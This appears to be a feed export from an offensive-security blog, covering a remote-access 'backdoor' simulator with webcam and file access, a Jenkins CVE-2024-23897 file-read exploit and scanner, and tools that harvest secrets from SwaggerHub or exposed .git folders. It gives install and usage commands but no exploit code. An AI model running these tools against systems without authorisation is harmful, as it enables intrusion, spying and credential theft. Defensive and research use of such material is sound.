tag:blogger.com,1999:blog-25880887028852948362024-03-13T02:45:50.331-07:00Offensive Sec BlogSecurity of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etcOffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.comBlogger883125tag:blogger.com,1999:blog-2588088702885294836.post-63273576705289059702024-03-13T02:45:00.000-07:002024-03-13T02:45:12.913-07:00BackDoorSim - An Educational Into Remote Administration Tools
<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCDyueyU26LM9aLQPbpoMyxMgwxtXzCl6HK6JmoKVrU27Y61F10oDEPbDOr4p5TW16bQZhXaZrEuXdUpLNkkCl1WceelIRXKLMOdmirxENlD_Z-P6zTwjZjBaex9O1A073GF3XNRajsht4LRva1xUw1NTphQ3xXDmkdKWEPVs-AozdAIjFUWKKtMApoAL4/s1905/BackDoorSim.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="955" data-original-width="1905" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCDyueyU26LM9aLQPbpoMyxMgwxtXzCl6HK6JmoKVrU27Y61F10oDEPbDOr4p5TW16bQZhXaZrEuXdUpLNkkCl1WceelIRXKLMOdmirxENlD_Z-P6zTwjZjBaex9O1A073GF3XNRajsht4LRva1xUw1NTphQ3xXDmkdKWEPVs-AozdAIjFUWKKtMApoAL4/w640-h320/BackDoorSim.png" width="640" /></a></div><br /><p></p><p><code>BackdoorSim</code> is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: <code>ControlServer</code> and <code>BackdoorClient</code>. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.</p> <span><a name="more"></a></span><div><br /></div><span style="font-size: large;"><b><strong>Disclaimer</strong></b></span><br /> <p>This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. 
Always ensure you have permission to use this tool in your intended environment.</p> <br /><span style="font-size: large;"><b><strong>Features</strong></b></span><br /> <ul> <li><strong>File Transfer</strong>: Upload and download files between server and client.</li> <li><strong>Screenshot Capture</strong>: Take screenshots from the client's system.</li> <li><strong>System Information Gathering</strong>: Retrieve detailed system and security software information.</li> <li><strong>Camera Access</strong>: Capture images from the client's webcam.</li> <li><strong>Notifications</strong>: Send and display notifications on the client system.</li> <li><strong>Help Menu</strong>: Easy access to command information and usage.</li> </ul> <br /><span style="font-size: large;"><b><strong>Installation</strong></b></span><br /> <p>To set up <code>BackdoorSim</code>, you will need to install it on both the server and client machines.</p> <ol> <li>Clone the repository:</li> </ol> <pre><code>git clone https://github.com/HalilDeniz/BackDoorSim.git<br /></code></pre> <ol start="2"> <li>Navigate to the project directory:</li> </ol> <pre><code>cd BackDoorSim<br /></code></pre> <ol start="3"> <li>Install the required dependencies:</li> </ol> <pre><code>pip install -r requirements.txt<br /></code></pre> <br /><span style="font-size: large;"><b><strong>Usage</strong></b></span><br /> <p>After starting both the server and client, you can use the following commands in the server's command prompt:</p> <ul> <li><code>upload [file_path]</code>: Upload a file to the client.</li> <li><code>download [file_path]</code>: Download a file from the client.</li> <li><code>screenshot</code>: Capture a screenshot from the client.</li> <li><code>sysinfo</code>: Get system information from the client.</li> <li><code>securityinfo</code>: Get security software status from the client.</li> <li><code>camshot</code>: Capture an image from the client's webcam.</li> <li><code>notify [title] [message]</code>: Send a notification to the 
client.</li> <li><code>help</code>: Display the help menu.</li> </ul> <br /><span style="font-size: large;"><b><strong>Disclaimer</strong></b></span><br /> <p>BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.</p> <br /><span style="font-size: large;"><b><strong>Note: RansomwareSim</strong></b></span><br /> <p>If you are interested in tools like BackdoorSim, be sure to check out my recently released <strong><a href="https://denizhalil.com/2023/12/30/ransomware-prevention-education/" rel="nofollow" target="_blank" title="RansomwareSim">RansomwareSim</a></strong> tool.</p> <br /><span style="font-size: large;"><b><strong>BackdoorSim: An Educational Introduction to Remote Administration Tools</strong></b></span><br /> <p>If you want to learn more, you can read our full article about the <a href="https://denizhalil.com/2024/01/29/educational-remote-administration-tool-backdoorsim/" rel="nofollow" target="_blank" title="Backdoor">Backdoor</a>.</p> <br /><span style="font-size: large;"><b><strong>Contributing</strong></b></span><br /> <p>Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.</p> <ol> <li>Fork the repository.</li> <li>Create a new branch for your feature or bug fix.</li> <li>Make your changes and commit them.</li> <li>Push your changes to your forked repository.</li> <li>Open a pull request in the main repository.</li> </ol> <br /><span style="font-size: large;"><b><strong>Contact</strong></b></span><br /> <p>For any inquiries or further information, you can reach me through the following channels:</p> <ul> <li>LinkedIn: <a href="https://www.linkedin.com/in/halil-ibrahim-deniz/" rel="nofollow" target="_blank" title="Halil Ibrahim Deniz">Halil Ibrahim Deniz</a></li> <li>TryHackMe: <a href="https://tryhackme.com/p/halilovic" rel="nofollow" target="_blank" title="Halilovic">Halilovic</a></li> <li>Instagram: <a href="https://www.instagram.com/deniz.halil333/" rel="nofollow" target="_blank" title="deniz.halil333">deniz.halil333</a></li> <li>YouTube: <a href="https://www.youtube.com/c/HalilDeniz" rel="nofollow" target="_blank" title="Halil Deniz">Halil Deniz</a></li> </ul> <br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/HalilDeniz/BackDoorSim" rel="nofollow" target="_blank" title="Download BackDoorSim">Download BackDoorSim</a></span></b></div>
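<p>As an aside on the kind of data a <code>sysinfo</code>-style command can gather, here is a minimal, benign sketch using only Python's standard library. The function name and field set are illustrative assumptions, not taken from the BackdoorSim source:</p>

```python
import json
import platform
import socket

def gather_sysinfo():
    """Collect basic, non-sensitive system details, similar in spirit
    to what a sysinfo-style command could report."""
    return {
        "hostname": socket.gethostname(),
        "os": platform.system(),
        "os_release": platform.release(),
        "architecture": platform.machine(),
        "python_version": platform.python_version(),
    }

if __name__ == "__main__":
    # Pretty-print the collected fields as JSON
    print(json.dumps(gather_sysinfo(), indent=2))
```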
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-23223064184790759722024-03-13T02:42:00.000-07:002024-03-13T02:42:21.094-07:00CVE-2024-23897 - Jenkins <= 2.441 & <= LTS 2.426.2 PoC And Scanner<article><div class="post-body entry-content" id="post-body-565184846932230502" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi2ujWgI-O8XhSDEW0GKqe34k767hx6qkhb75LEchmxfueorSZJchGkvtr6i3N6sWi2UBcSUwXC5YJg6FMScmxBFv58uPGkI9kYXZqbm-1fjnmjP-9MQmRRsOuCooses0JgzkXaH2BhtC9OOSgnDiXnrhtOrC5UOyN2SGEJd5QyIkhGrc-rjS3Qi9WJPMI9"><img alt="" border="0" height="278" id="BLOGGER_PHOTO_ID_733792974369x8788354" src="https://blogger.googleusercontent.com/img/a/AVvXsEi2ujWgI-O8XhSDEW0GKqe34k767hx6qkhb75LEchmxfueorSZJchGkvtr6i3N6sWi2UBcSUwXC5YJg6FMScmxBFv58uPGkI9kYXZqbm-1fjnmjP-9MQmRRsOuCooses0JgzkXaH2BhtC9OOSgnDiXnrhtOrC5UOyN2SGEJd5QyIkhGrc-rjS3Qi9WJPMI9=w640-h278" width="640" /></a></p><br /> <p>Exploitation and scanning tool specifically designed for Jenkins versions <code><= 2.441 & <= LTS 2.426.2</code>. It leverages <code>CVE-2024-23897</code> to assess and exploit vulnerabilities in Jenkins instances. </p> <span><a name="more"></a></span><p><br /></p><span style="font-size: large;"><b>Usage</b></span><br /> <p>Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.</p> <pre><code>python CVE-2024-23897.py -t <target> -p <port> -f <file><br /></code></pre> <p>or</p> <pre><code>python CVE-2024-23897.py -i <input_file> -f <file><br /></code></pre> <p><strong>Parameters:</strong> - <code>-t</code> or <code>--target</code>: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block. 
- <code>-i</code> or <code>--input-file</code>: Path to input file containing hosts in the format of <code>http://1.2.3.4:8080/</code> (one per line). - <code>-o</code> or <code>--output-file</code>: Export results to file (optional). - <code>-p</code> or <code>--port</code>: Specify the port number. Default is 8080 (optional). - <code>-f</code> or <code>--file</code>: Specify the file to read on the target system.</p> <br /><span style="font-size: large;"><b>Changelog</b></span><br /> <br /><b>[27th January 2024] - Feature Request</b><br /> <ul> <li>Added scanning/exploiting via input file with hosts (<code>-i INPUT_FILE</code>). </li> <li>Added export to file (<code>-o OUTPUT_FILE</code>).</li> </ul> <br /><b>[26th January 2024] - Initial Release</b><br /> <ul> <li>Initial release.</li> </ul> <br /><span style="font-size: large;"><b>Contributing</b></span><br /> <p>Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.</p> <br /><span style="font-size: large;"><b>Author</b></span><br /> <p><strong>Alexander Hagenah</strong> - <a href="https://primepage.de" rel="nofollow" target="_blank" title="URL">URL</a> - <a href="https://twitter.com/xaitax" rel="nofollow" target="_blank" title="Twitter">Twitter</a></p> <br /><span style="font-size: large;"><b>Disclaimer</b></span><br /> <p>This tool is meant for educational and professional purposes only. Unauthorized scanning and exploiting of systems is illegal and unethical. Always ensure you have explicit permission to test and exploit any systems you target.</p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/xaitax/CVE-2024-23897" rel="nofollow" target="_blank" title="Download CVE-2024-23897">Download CVE-2024-23897</a></span></b></div></div></article>
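<p>For illustration of how a flexible <code>-t</code> target syntax can be handled, the sketch below expands single IPs, comma-separated lists, and CIDR blocks with Python's standard <code>ipaddress</code> module. The helper name is hypothetical and not from the tool's source, and the dash-range syntax is omitted for brevity:</p>

```python
import ipaddress

def expand_targets(spec):
    """Expand a target spec (single IPs, comma-separated lists, and
    CIDR blocks) into a list of individual host addresses."""
    hosts = []
    for part in spec.split(","):
        part = part.strip()
        if "/" in part:
            # CIDR block: hosts() excludes network and broadcast addresses
            net = ipaddress.ip_network(part, strict=False)
            hosts.extend(str(ip) for ip in net.hosts())
        else:
            # Single address; raises ValueError on malformed input
            hosts.append(str(ipaddress.ip_address(part)))
    return hosts
```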
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-1872601948677178972024-03-13T02:39:00.000-07:002024-03-13T02:39:55.908-07:00swaggerHole - A Python3 Script Searching For Secret On Swaggerhub<article><div class="post-body entry-content" id="post-body-7023330825648976169" itemprop="articleBody"><p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgRljQyFcgTZb4QTUQAXiP9eyW_Fekzx2kyra3RU1VavN4YnL6zw4rNwfeZnizpu6kduRsMj2JcgySp-UuMDoxok-6vBpNlpU4gea4gmMI7cdXGxPQ8EvKjXjpqX9Awz3WGQsAU5OctKJ7iJwfi0AczjKJ-h92AKkwZJrxcxU-1Wr3ui1-ITAGicwPyjc53"><img alt="" border="0" height="470" id="BLOGGER_PHOTO_ID_7338562964720588994" src="https://blogger.googleusercontent.com/img/a/AVvXsEgRljQyFcgTZb4QTUQAXiP9eyW_Fekzx2kyra3RU1VavN4YnL6zw4rNwfeZnizpu6kduRsMj2JcgySp-UuMDoxok-6vBpNlpU4gea4gmMI7cdXGxPQ8EvKjXjpqX9Awz3WGQsAU5OctKJ7iJwfi0AczjKJ-h92AKkwZJrxcxU-1Wr3ui1-ITAGicwPyjc53=w640-h470" width="640" /></a> </p><p align="center"><br /></p><h2 style="text-align: left;">Introduction </h2><div><div>This tool is made to automate the process of retrieving secrets in the public APIs on [swaggerHub](https://app.swaggerhub.com/search). 
This tool is multithreaded and pipe mode is available :) </div><span><a name="more"></a></span><div><br /></div><h2 style="text-align: left;">Requirements </h2><div> <ul> <li>python3 (<code>sudo apt install python3</code>)</li> <li>pip3 (<code>sudo apt install python3-pip</code>)</li> </ul> </div><h2 style="text-align: left;">Installation </h2><div> <pre><code>pip3 install swaggerhole<br /></code></pre> or clone this repository and run <pre><code>git clone https://github.com/Liodeus/swaggerHole.git<br />pip3 install .<br /></code></pre><div><br /></div><h2 style="text-align: left;"> Usage </h2><pre><code> _____ _ __ ____ _ ____ _ ____ _ ___ _____<br /> / ___/| | /| / // __ `// __ `// __ `// _ \ / ___/<br /> (__ ) | |/ |/ // /_/ // /_/ // /_/ // __// / <br />/____/ |__/|__/ \__,_/ \__, / \__, / \___//_/ <br /> __ __ __ /____/ /____/ <br /> / / / /____ / /___ <br /> / /_/ // __ \ / // _ \ <br /> / __ // /_/ // // __/ <br />/_/ /_/ \____//_/ \___/ <br /><br />usage: swaggerhole [-h] [-s SEARCH] [-o OUT] [-t THREADS] [-j] [-q] [-du] [-de]<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> -s SEARCH, --search SEARCH<br /> Term to search<br /> -o OUT, --out OUT Output directory<br /> -t THREADS, --threads THREADS<br /> Threads number (Default 25)<br /> -j, --json Json ouput<br /> -q, --quiet Remove banner<br /> -du, --deactivate_url<br /> Deactivate the URL filtering<br /> -de, --deactivate_email<br /> Deactivate the email filtering<br /></code></pre><div><br /></div><h3 style="text-align: left;">Search for secrets about a domain </h3><pre><code>swaggerHole -s test.com<br /><br />echo test.com | swaggerHole<br /></code></pre><h3 style="text-align: left;">Search for secrets about a domain and output to JSON </h3><pre><code>swaggerHole -s test.com --json<br /><br />echo test.com | swaggerHole --json<br /></code></pre><h3 style="text-align: left;">Search for secrets about a domain and do it fast :) </h3><pre><code>swaggerHole -s test.com -t 100<br /><br />echo test.com | swaggerHole -t 100<br /></code></pre><div><br /></div><h2 
style="text-align: left;">Output explanation</h2></div><h3 style="text-align: left;">Normal output</h3><div> `Finding_Type - Finding - [Swagger_Name][Date_Last_Update][Line:Number]` </div><h3 style="text-align: left;">Json output</h3><div> `{"Finding_Type": Finding, "File": File_path, "Date": Date_Last_Update, "Line": Number}` </div><h3 style="text-align: left;">Deactivate url/email </h3><div>Using -du or -de remove the filtering done by the tool. There is more false positive with those options. </div><div><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Liodeus/swaggerHole" rel="nofollow" target="_blank" title="Download swaggerHole">Download swaggerHole</a></span></b></div></div></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer">
</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-58070731105916832682024-02-23T16:40:00.000-08:002024-02-23T16:40:01.369-08:00RepoReaper - An Automated Tool Crafted To Meticulously Scan And Identify Exposed .Git Repositories Within Specified Domains And Their Subdomains<article><div class="post-body entry-content" id="post-body-7991241996290697549" itemprop="articleBody"><p style="text-align: center;"><img alt="" border="0" height="322" id="BLOGGER_PHOTO_ID_7337938534126680226" src="https://blogger.googleusercontent.com/img/a/AVvXsEg_5C0WucZsbXT-PjR821HMxfyBed5n2_AH4xECr_7ybskQxryBjruetPisOrAxwdyihxXskVFaZP7SEZbXgipsiaqbysAyRwtTRCq6vQuK4IjA_cILQ4-olB17KIckzfGZ7neYf_ILbVYd5NVFxczPjh-kA94f7bzMfCUHV7CybCy80PeMyG69T8j9Llwj=w640-h322" width="640" /></p><p><br /></p> <p>RepoReaper is a precision tool designed to automate the identification of exposed <code>.git</code> repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible <code>.git</code> files. 
This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.</p><span style="font-size: large;"><b>Features</b></span><br /> <ul> <li>Automated scanning of domains and subdomains for exposed <code>.git</code> repositories.</li> <li>Streamlines the detection of sensitive data exposures.</li> <li>User-friendly command-line interface.</li> <li>Ideal for security audits and bug bounty hunting.</li> </ul> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <p>Clone the repository and install the required dependencies:</p> <pre><code>git clone https://github.com/YourUsername/RepoReaper.git<br />cd RepoReaper<br />pip install -r requirements.txt<br />chmod +x RepoReaper.py<br /></code></pre> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>RepoReaper is executed from the command line and will prompt for the path to a file containing a list of domains or subdomains to be scanned.</p> <p>To start RepoReaper, simply run:</p> <pre><code>./RepoReaper.py<br /> or<br />python3 RepoReaper.py<br /></code></pre> <p>Upon execution, RepoReaper will ask for the path to the file containing the domains or subdomains:</p> <pre><code>Enter the path of the file containing domains<br /></code></pre> <p>Provide the path to your text file when prompted. The file should contain one domain or subdomain per line, like so:</p> <pre><code>example.com<br />subdomain.example.com<br />anotherdomain.com<br /></code></pre> <p>RepoReaper will then proceed to scan the provided domains or subdomains for exposed <code>.git</code> repositories and report its findings. </p> <br /><span style="font-size: x-large;"><b>Disclaimer</b></span><br /> <p>This tool is intended for educational purposes and security research only. 
The user assumes all responsibility for any damages or misuse resulting from its use.</p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/chaudharyarjun/RepoReaper" rel="nofollow" target="_blank" title="Download RepoReaper">Download RepoReaper</a></span></b></div></div></article>
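<p>The exposure check that RepoReaper automates essentially boils down to requesting well-known Git paths for each domain and sanity-checking the response body. A minimal, hypothetical sketch of that heuristic follows; the function names are illustrative, not from the RepoReaper source:</p>

```python
def candidate_git_urls(domain):
    """Build the URLs an exposed-.git probe would request for a domain."""
    domain = domain.strip().rstrip("/")
    return [
        f"https://{domain}/.git/HEAD",
        f"https://{domain}/.git/config",
    ]

def looks_like_git_head(body):
    """A real .git/HEAD is either a symbolic ref or a bare 40-hex commit id,
    which distinguishes it from an HTML error page."""
    body = body.strip()
    if body.startswith("ref: refs/"):
        return True
    return len(body) == 40 and all(c in "0123456789abcdef" for c in body)
```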
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-89203226825854494272024-02-23T16:32:00.000-08:002024-02-23T16:32:55.245-08:00SploitScan - A Sophisticated Cybersecurity Utility Designed To Provide Detailed Information On Vulnerabilities And Associated Proof-Of-Concept (PoC) Exploits<article><div class="post-body entry-content" id="post-body-2172782823988776098" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgT53TjuDpra62seqxecO1RspoOT58k-Ypky8RCZ8xjX775i76jCOkM15qD754BhHjRjr0rEvzcQ-f5GaEhwoycr1mnV2xMcucv-_wt_RiUb2I5ijl0V_0iFWVvFV4ZHYPveBfM1xWDfas7HqhF-bNutW8h02wcF2cHQh8Lgxnsv2O7E8BHR_aM86MqSuvv"><img alt="" border="0" height="398" id="BLOGGER_PHOTO_ID_7337928976700792594" src="https://blogger.googleusercontent.com/img/a/AVvXsEgT53TjuDpra62seqxecO1RspoOT58k-Ypky8RCZ8xjX775i76jCOkM15qD754BhHjRjr0rEvzcQ-f5GaEhwoycr1mnV2xMcucv-_wt_RiUb2I5ijl0V_0iFWVvFV4ZHYPveBfM1xWDfas7HqhF-bNutW8h02wcF2cHQh8Lgxnsv2O7E8BHR_aM86MqSuvv=w640-h398" width="640" /></a></p><br /> <p>SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. Empowering cybersecurity professionals with the capability to swiftly identify and apply known and test exploits. 
It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.</p><span><a name="more"></a></span><p><br /></p><span style="font-size: large;"><b>Features</b></span><br /> <ul> <li><strong>CVE Information Retrieval</strong>: Fetches CVE details from the National Vulnerability Database.</li> <li><strong>EPSS Integration</strong>: Includes Exploit Prediction Scoring System (EPSS) data, offering a probability score for the likelihood of CVE exploitation, aiding in prioritization.</li> <li><strong>PoC Exploits Aggregation</strong>: Gathers publicly available PoC exploits, enhancing the understanding of vulnerabilities.</li> <li><strong>CISA KEV</strong>: Shows if the CVE has been listed in the Known Exploited Vulnerabilities (KEV) of CISA.</li> <li><strong>Patching Priority System</strong>: Evaluates and assigns a priority rating for patching based on various factors including public exploits availability.</li> <li><strong>Multi-CVE Support and Export Options</strong>: Supports multiple CVEs in a single run and allows exporting the results to JSON and CSV formats.</li> <li><strong>User-Friendly Interface</strong>: Easy to use, providing clear and concise information.</li> <li><strong>Comprehensive Security Tool</strong>: Ideal for quick security assessments and staying informed about recent vulnerabilities.</li> </ul> <br /><span style="font-size: large;"><b>Usage</b></span><p><strong>Regular</strong>:</p> <pre><code>python sploitscan.py CVE-YYYY-NNNNN<br /></code></pre> <p><strong>Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces.</strong></p> <pre><code>python sploitscan.py CVE-YYYY-NNNNN CVE-YYYY-NNNNN<br /></code></pre> <p><strong>Optional: Export the results to a JSON or CSV file. 
Specify the format: 'json' or 'csv'.</strong></p> <pre><code>python sploitscan.py CVE-YYYY-NNNNN -e JSON<br /></code></pre> <br /><span style="font-size: large;"><b>Patching Prioritization System</b></span><br /> <p>The Patching Prioritization System in SploitScan provides a strategic approach to prioritizing security patches based on the severity and exploitability of vulnerabilities. It's influenced by the model from <a href="https://github.com/TURROKS/CVE_Prioritizer" rel="nofollow" target="_blank" title="CVE Prioritizer">CVE Prioritizer</a>, with enhancements for handling publicly available exploits. Here's how it works:</p> <ul> <li>A+ Priority: Assigned to CVEs listed in CISA's KEV or those with publicly available exploits. This reflects the highest risk and urgency for patching.</li> <li>A to D Priority: Based on a combination of CVSS scores and EPSS probability percentages. The decision matrix is as follows:</li> <li>A: CVSS score >= 6.0 and EPSS score >= 0.2. High severity with a significant probability of exploitation.</li> <li>B: CVSS score >= 6.0 but EPSS score < 0.2. High severity but lower probability of exploitation.</li> <li>C: CVSS score < 6.0 and EPSS score >= 0.2. Lower severity but higher probability of exploitation.</li> <li>D: CVSS score < 6.0 and EPSS score < 0.2. Lower severity and lower probability of exploitation.</li> </ul> <p>This system assists users in making informed decisions on which vulnerabilities to patch first, considering both their potential impact and the likelihood of exploitation. 
Thresholds can be changed to your business needs.</p> <br /><span style="font-size: large;"><b>Changelog</b></span><br /> <br /><b>[17th February 2024] - Enhancement Update</b><br /> <ul> <li><strong>Additional Information</strong>: Added further information such as references & vector string</li> <li><strong>Removed</strong>: Star count in publicly available exploits</li> </ul> <br /><b>[15th January 2024] - Enhancement Update</b><br /> <ul> <li><strong>Multiple CVE Support</strong>: Now capable of handling multiple CVE IDs in a single execution.</li> <li><strong>JSON and CSV Export</strong>: Added functionality to export results to JSON and CSV files.</li> <li><strong>Enhanced CVE Display</strong>: Improved visual differentiation and information layout for each CVE.</li> <li><strong>Patching Priority System</strong>: Introduced a priority rating system for patching, influenced by various factors including the availability of public exploits.</li> </ul> <br /><b>[13th January 2024] - Initial Release</b><br /> <ul> <li>Initial release of SploitScan.</li> </ul> <br /><span style="font-size: large;"><b>Contributing</b></span><br /> <p>Contributions are welcome. 
Please feel free to fork, modify, and make pull requests or report issues.</p> <br /><span style="font-size: large;"><b>Author</b></span><br /> <p><strong>Alexander Hagenah</strong> - <a href="https://primepage.de" rel="nofollow" target="_blank" title="URL">URL</a> - <a href="https://twitter.com/xaitax" rel="nofollow" target="_blank" title="Twitter">Twitter</a></p> <br /><span style="font-size: large;"><b>Credits</b></span><br /> <ul> <li><a href="https://nvd.nist.gov/developers/vulnerabilities" rel="nofollow" target="_blank" title="NIST NVD">NIST NVD</a></li> <li><a href="https://www.first.org/epss/api" rel="nofollow" target="_blank" title="FIRST EPSS">FIRST EPSS</a></li> <li><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" rel="nofollow" target="_blank" title="CISA Known Exploited Vulnerabilities Catalog">CISA Known Exploited Vulnerabilities Catalog</a></li> <li><a href="https://poc-in-github.motikan2010.net/" rel="nofollow" target="_blank" title="nomi-sec PoC-in-GitHub API">nomi-sec PoC-in-GitHub API</a></li> </ul><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/xaitax/SploitScan" rel="nofollow" target="_blank" title="Download SploitScan">Download SploitScan</a></span></b></div></div></article>
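<p>The patching prioritization matrix described above maps directly onto a small decision function. The following is an illustrative re-implementation of the documented thresholds, not SploitScan's actual source:</p>

```python
def patch_priority(cvss, epss, in_cisa_kev=False, has_public_exploit=False):
    """Map CVSS/EPSS scores (plus KEV and public-exploit flags) to the
    A+/A/B/C/D ratings of the documented decision matrix."""
    if in_cisa_kev or has_public_exploit:
        return "A+"  # CISA KEV listing or public exploit: highest urgency
    if cvss >= 6.0:
        return "A" if epss >= 0.2 else "B"  # high severity, split on EPSS
    return "C" if epss >= 0.2 else "D"      # lower severity, split on EPSS
```

As the post notes, the 6.0 CVSS and 0.2 EPSS cut-offs are defaults that can be adjusted to business needs.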
<div style="clear: both;"></div>
<div class="post-footer">
</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-28433561421054772882024-02-20T16:36:00.000-08:002024-02-20T16:36:24.259-08:00SwaggerSpy - Automated OSINT On SwaggerHub<article><div class="post-body entry-content" id="post-body-3027054743303715784" itemprop="articleBody"><p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgCCIAE49ZM4rbvRN5fZ65zN82Q2PPQ79rLJxPpJMJaObT7Ug9CLu6Ld84C374UelSyoXL1PFcbpFiXRg2YBXZnHqueBjjwVyqzbLbPZL0CoWjpWZu5mgT2EYV4zAWDzav4Q0XNvfLO6b4F_6usZPxXMTQ_HiAvsJyZmYrCOZVL6j_lLJmGDLZSk1vQH9t4"><img alt="" border="0" height="364" id="BLOGGER_PHOTO_ID_7336842125363628178" src="https://blogger.googleusercontent.com/img/a/AVvXsEgCCIAE49ZM4rbvRN5fZ65zN82Q2PPQ79rLJxPpJMJaObT7Ug9CLu6Ld84C374UelSyoXL1PFcbpFiXRg2YBXZnHqueBjjwVyqzbLbPZL0CoWjpWZu5mgT2EYV4zAWDzav4Q0XNvfLO6b4F_6usZPxXMTQ_HiAvsJyZmYrCOZVL6j_lLJmGDLZSk1vQH9t4=w640-h364" width="640" /></a></p> <br /> <p>SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.</p> <span><a name="more"></a></span><p align="center"><br /></p><b>What is Swagger?</b><br /> <p>Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.</p> <br /><b>About SwaggerHub</b><br /> <p>SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. 
It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.</p> <br /><b>Why OSINT on SwaggerHub?</b><br /> <p>Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:</p> <ol> <li> <p><strong>Developer Oversights:</strong> Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.</p> </li> <li> <p><strong>Security Best Practices:</strong> OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.</p> </li> <li> <p><strong>Preventing Data Leaks:</strong> By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.</p> </li> <li> <p><strong>Risk Mitigation:</strong> Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.</p> </li> <li> <p><strong>Compliance and Privacy:</strong> Many industries have stringent compliance requirements regarding the protection of sensitive data. 
OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.</p> </li> <li> <p><strong>Educational Opportunities:</strong> Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.</p> </li> </ol> <p>By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.</p> <br /><span style="font-size: large;"><b>How SwaggerSpy Works</b></span><br /> <p>SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.</p> <br /><span style="font-size: large;"><b>Getting Started</b></span><br /> <p>To use SwaggerSpy, follow these steps:</p> <ol> <li><strong>Installation:</strong> Clone the SwaggerSpy repository and install the required dependencies.</li> </ol> <pre><code>git clone https://github.com/UndeadSec/SwaggerSpy.git<br />cd SwaggerSpy<br />pip install -r requirements.txt<br /></code></pre> <ol start="2"> <li><strong>Usage:</strong> Run SwaggerSpy with the target search terms (more accurate with domains).</li> </ol> <pre><code>python swaggerspy.py searchterm<br /></code></pre> <ol start="3"> <li><strong>Results:</strong> SwaggerSpy will generate a report containing OSINT findings, including information about the API, endpoints, and secrets.</li> </ol> <br /><span style="font-size: large;"><b>Disclaimer</b></span><br /> <p>SwaggerSpy is intended for educational and research purposes only. 
